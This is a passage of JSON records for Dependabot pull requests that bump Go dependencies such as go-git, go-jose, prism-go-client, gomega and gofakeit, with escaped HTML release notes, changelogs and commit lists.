href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/45ae193b3a60aa8ec8a3e373f7265a7819473d5f\"\u003e\u003ccode\u003e45ae193\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1944\"\u003e#1944\u003c/a\u003e from go-git/fix-perms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fda4f7464b597ff33d2dea1c026482a5e900037c\"\u003e\u003ccode\u003efda4f74\u003c/code\u003e\u003c/a\u003e storage: filesystem/dotgit, Skip writing pack files that already exist on disk\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/2212dc7caeb2a389fe2129923811ef63f75a557a\"\u003e\u003ccode\u003e2212dc7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1941\"\u003e#1941\u003c/a\u003e from go-git/renovate/releases/v5.x-go-github.com-go-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ebb2d7da7f5d5aebeaa0b5e13276d72d602c1ae3\"\u003e\u003ccode\u003eebb2d7d\u003c/code\u003e\u003c/a\u003e build: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY]\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Add V4 DomainManager service, User Service and SubnetIPReservation methods by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/322\"\u003enutanix-cloud-native/prism-go-client#322\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/219\"\u003e#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/316\"\u003e#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/317\"\u003e#317\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs to include VM vTPM configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved the v4 storage container client from storage namespace as it was based on the v4 alpha APIs which are no longer supported.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d66a76f1aec01d16e09309e3301ba0cd602a8f17\"\u003e\u003ccode\u003ed66a76f\u003c/code\u003e\u003c/a\u003e converged: add DeleteCdRom and GenerateConsoleToken to VMs service\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/0104740467e050461f068ebe465fc057af09f283\"\u003e\u003ccode\u003e0104740\u003c/code\u003e\u003c/a\u003e Adding changes to support error handling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/c121d041c92a637edaaed197419192aa79a88141\"\u003e\u003ccode\u003ec121d04\u003c/code\u003e\u003c/a\u003e feat: Adding api call to add customAttributes to VM (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/334\"\u003e#334\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2a1c8de076a0786faa16f7ee2cd03f3d8e474e77\"\u003e\u003ccode\u003e2a1c8de\u003c/code\u003e\u003c/a\u003e chore: bump jetlify action to v0.14.0 (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2bbbcd3103a542465227608d314804befbbcd3c1\"\u003e\u003ccode\u003e2bbbcd3\u003c/code\u003e\u003c/a\u003e fix: V4 API fixes for Objects Lite upload and configurable timeouts  (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/8b4db79f4c6750828da9466c0d49e74986b447a7\"\u003e\u003ccode\u003e8b4db79\u003c/code\u003e\u003c/a\u003e feat: add Images, Templates, and OVAs services for V4 packer migration (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/75efe03848ff09e1a6a00b8e06247d546986d677\"\u003e\u003ccode\u003e75efe03\u003c/code\u003e\u003c/a\u003e fix: removed usused Karbon APIs and renames in-use APIs to Konnector (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d23758422537995b8c946153f5d2bf949b430a55\"\u003e\u003ccode\u003ed237584\u003c/code\u003e\u003c/a\u003e fix(bumup): updating ntnx-api-golang-clients to latest versions (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/323\"\u003e#323\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d8d91a890f00890b90ee61560e7400c07a601e75\"\u003e\u003ccode\u003ed8d91a8\u003c/code\u003e\u003c/a\u003e feat: Implement DomainManager service with GetPrismCentralVersion (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/318\"\u003e#318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/037b98630f382132c9d896e721d01e61da3650c9\"\u003e\u003ccode\u003e037b986\u003c/code\u003e\u003c/a\u003e feat: Implement List and Get methods for Users service (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.3.4...v0.7.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.38.2 to 1.39.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.39.1\u003c/h2\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003ev1.39.0\u003c/h2\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003ev1.38.3\u003c/h2\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/gomega's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cp\u003emake string formatitng more consistent for users who use format.Object directly\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/1a25a36414f51967615277623eed3b85b0ca6ce8\"\u003e\u003ccode\u003e1a25a36\u003c/code\u003e\u003c/a\u003e v1.39.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/406faee2de82aa2584ea4d76b0e2662f70ae4d2c\"\u003e\u003ccode\u003e406faee\u003c/code\u003e\u003c/a\u003e bump all deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/49561ad293853e660030f8397b07607127e3ebb7\"\u003e\u003ccode\u003e49561ad\u003c/code\u003e\u003c/a\u003e v1.39.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/8f7f42585ccc794dcb3a4979ac7d67e00fb070ae\"\u003e\u003ccode\u003e8f7f425\u003c/code\u003e\u003c/a\u003e document MatchErrorStrictly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/bae643da0469185d9502e8d7528da137f4c62320\"\u003e\u003ccode\u003ebae643d\u003c/code\u003e\u003c/a\u003e add matcher relecting errors.Is behavior\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/a3ca2ca026268dc6acfc60a2e8393b33b428c507\"\u003e\u003ccode\u003ea3ca2ca\u003c/code\u003e\u003c/a\u003e v1.38.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/4dada364c7635fffe6b8a6b45a7588dabd64cdf4\"\u003e\u003ccode\u003e4dada36\u003c/code\u003e\u003c/a\u003e fix failing hav...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10730","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10730","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10730/packages"},{"uuid":"4208385040","node_id":"PR_kwDONfDiq87QEjOg","number":58,"state":"closed","title":"build(deps): bump the go-minor-and-patch group across 1 directory with 11 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-20T10:33:54.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-05T19:20:06.000Z","updated_at":"2026-04-20T10:33:56.000Z","time_to_close":1264428,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"go-minor-and-patch","update_count":11,"packages":[{"name":"github.com/brianvoe/gofakeit/v7","old_version":"7.14.0","new_version":"7.14.1","repository_url":"https://github.com/brianvoe/gofakeit"},{"name":"github.com/bufbuild/protocompile","old_version":"0.4.0","new_version":"0.14.1","repository_url":"https://github.com/bufbuild/protocompile"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.3.0","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/hashicorp/go-plugin","old_version":"1.6.3","new_version":"1.7.0","repository_url":"https://github.com/hashicorp/go-plugin"},{"name":"github.com/pb33f/libopenapi","old_version":"0.22.3","new_version":"0.35.1","repository_url":"https://github.com/pb33f/libopenapi"},{"name":"github.com/pb33f/libopenapi-validator","old_version":"0.4.7","new_version":"0.13.3","repository_url":"https://github.com/pb33f/libopenapi-validator"},{"name":"github.com/aws/aws-lambda-go","old_version":"1.49.0","new_version":"1.54.0","repository_url":"https://github.com/aws/aws-lambda-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":null,"ecosystem":"go"},"body":"Bumps the go-minor-and-patch group with 8 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/brianvoe/gofakeit/v7](https://github.com/brianvoe/gofakeit) | `7.14.0` | `7.14.1` |\n| [github.com/bufbuild/protocompile](https://github.com/bufbuild/protocompile) | `0.4.0` | `0.14.1` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.3.0` | `5.3.1` |\n| [github.com/hashicorp/go-plugin](https://github.com/hashicorp/go-plugin) | `1.6.3` | `1.7.0` |\n| [github.com/pb33f/libopenapi](https://github.com/pb33f/libopenapi) | `0.22.3` | `0.35.1` |\n| [github.com/pb33f/libopenapi-validator](https://github.com/pb33f/libopenapi-validator) | `0.4.7` | `0.13.3` |\n| [github.com/aws/aws-lambda-go](https://github.com/aws/aws-lambda-go) | `1.49.0` | `1.54.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n\n\nUpdates `github.com/brianvoe/gofakeit/v7` from 7.14.0 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/ee08eae8003a40768c47bacd76dfa5503a461752\"\u003e\u003ccode\u003eee08eae\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/brianvoe/gofakeit/issues/392\"\u003e#392\u003c/a\u003e from shubhamatkal/fix/password-guarantee-character-sets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/c38fe1a8fb22e850fbdbbe2a54d5954a60e13a65\"\u003e\u003ccode\u003ec38fe1a\u003c/code\u003e\u003c/a\u003e github - workflow less verbose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/22b91127ddcc896b66a389c2c00b73985091d11c\"\u003e\u003ccode\u003e22b9112\u003c/code\u003e\u003c/a\u003e datetime - yearly fix\u003c/li\u003e\n\u003cli\u003e\u003ca 